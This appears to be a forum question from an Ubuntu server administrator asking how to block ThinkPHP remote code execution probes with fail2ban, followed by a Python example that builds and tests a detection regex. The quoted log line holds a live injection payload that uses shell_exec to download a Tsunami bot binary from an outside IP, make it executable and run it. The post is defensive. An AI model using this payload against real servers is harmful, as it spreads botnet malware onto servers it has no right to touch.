Block Remote Code Execution Ubuntu Server Fail2Ban & Cloudflare


Recently I have noticed that my Ubuntu (LEMP) server has several remote code execution entries in its logs (access.log file). I use Fail2ban, Cloudflare and CSF. Is there any possibility of blocking such attacks using fail2ban? If I manage to block such attacks, I can block those IPs from the Cloudflare WAF.



183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"









      fail2ban cloudflare ubuntu-18.04






asked 11 hours ago by Chathu; edited 9 mins ago
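A candidate fail2ban failregex for the probe shown in the question, checked offline in Python against constructed log lines (an added example, not part of the original post). Assumptions: the first log field is the real client address rather than a Cloudflare edge IP, the filter file name is hypothetical, and `HOST_GROUP` is a simplified stand-in for fail2ban's `<HOST>` tag.

```python
import re
from collections import Counter

# Simplified stand-in for fail2ban's <HOST> tag (the real expansion is broader).
HOST_GROUP = r"(?P<host>[0-9A-Fa-f:.]+)"

# Candidate failregex for a hypothetical filter file (e.g. filter.d/nginx-rce-probe.conf).
# - (?i): PHP function names are case-insensitive, so match them that way.
# - \[[^\]]*\] accepts a full timestamp or the empty [] used in fail2ban's nginx filters.
# - [^"]* keeps the match inside the quoted request even when the payload has spaces.
FAILREGEX = (
    r'(?i)^<HOST> \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) [^"]*'
    r'(?:invokefunction|call_user_func_array|shell_exec)[^"]*"'
)

# Constructed sample lines (documentation IP ranges, placeholder payload).
SAMPLE_LOG = r"""
203.0.113.7 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='PLACEHOLDER CMD' HTTP/1.1" 400 166 "-" "Tsunami/2.0"
198.51.100.20 - - [06/Mar/2019:19:12:25 +0530] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [] "POST /?function=Call_User_Func_Array HTTP/1.1" 404 0 "-" "-"
198.51.100.33 - - [06/Mar/2019:19:13:02 +0530] "GET /blog HTTP/1.1" 200 900 "https://example.org/?q=shell_exec" "Mozilla/5.0"
""".strip().splitlines()


def compile_failregex(failregex):
    """Expand <HOST> the way a filter would and compile the pattern."""
    return re.compile(failregex.replace("<HOST>", HOST_GROUP))


def offenders(lines, failregex=FAILREGEX, maxretry=1):
    """Return {ip: hits} for addresses with at least maxretry matching lines."""
    rx = compile_failregex(failregex)
    hits = Counter(m.group("host") for m in map(rx.search, lines) if m)
    return {ip: n for ip, n in hits.items() if n >= maxretry}


if __name__ == "__main__":
    for ip, n in offenders(SAMPLE_LOG).items():
        print(f"ban candidate {ip}: {n} matching request(s)")
```

The `FAILREGEX` string is what would go on the `failregex =` line of the filter's `[Definition]` section, and `fail2ban-regex` can run the same check against the live access.log. The fourth sample line shows why the pattern is anchored to the quoted request: a marker that appears only in the referer does not produce a ban.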





















